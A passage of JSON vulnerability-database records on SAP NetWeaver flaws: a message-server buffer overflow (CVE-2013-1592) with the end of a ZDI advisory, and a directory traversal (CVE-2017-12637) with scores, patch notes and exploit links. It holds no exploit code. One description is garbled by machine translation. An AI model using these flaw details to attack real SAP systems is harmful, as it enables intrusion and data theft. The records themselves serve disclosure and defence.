at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
}
],
"trust": 5.49
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=24511",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-1592"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1592",
"trust": 2.9
},
{
"db": "BID",
"id": "57956",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1028148",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "24511",
"trust": 1.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54229",
"trust": 0.6
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367",
"trust": 0.6
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2013-1592",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "120350",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114279",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"id": "VAR-202001-0832",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.319000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "top page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57956"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/cve/cve-2013-1592"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028148"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
},
{
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28248"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/24511/"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1800603."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
},
{
"trust": 0.1,
"url": "http://www.sap.com/platform/netweaver/index.epx."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"date": "2013-02-13T00:00:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"date": "2013-02-15T23:44:44",
"db": "PACKETSTORM",
"id": "120350"
},
{
"date": "2012-06-28T03:51:55",
"db": "PACKETSTORM",
"id": "114279"
},
{
"date": "2013-02-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"date": "2020-01-23T19:15:11.327000",
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-31T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"date": "2013-06-12T18:46:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"date": "2020-01-31T17:08:36.590000",
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
}
],
"trust": 0.6
}
}
VAR-201708-0889
Vulnerability from variot - Updated: 2024-02-20 02:13Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks on this vulnerability 2017 Year 8 Observed on the moon. Vendors have confirmed this vulnerability SAP Security Note 2486657 It is released as.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-0889",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"cve": "CVE-2017-12637",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12637",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12637",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12637",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-277",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-12637",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks on this vulnerability 2017 Year 8 Observed on the moon. Vendors have confirmed this vulnerability SAP Security Note 2486657 It is released as.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "VULMON",
"id": "CVE-2017-12637"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12637",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-12637",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"id": "VAR-201708-0889",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-02-20T02:13:05.846000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "August 2017 (2486657)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra25/nuclei-templates "
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra/nuclei-templates "
},
{
"title": "Kenzer Templates [1289]",
"trust": 0.1,
"url": "https://github.com/elsfa7-110/kenzer-templates "
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.sh0w.top/index.php/archives/7/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12637"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12637"
},
{
"trust": 0.8,
"url": "https://www.onapsis.com/blog/sap-security-notes-august-2017-remote-code-injection-vulnerability-java-component"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/merlinepedra25/nuclei-templates"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
}
],
"sources": [
{
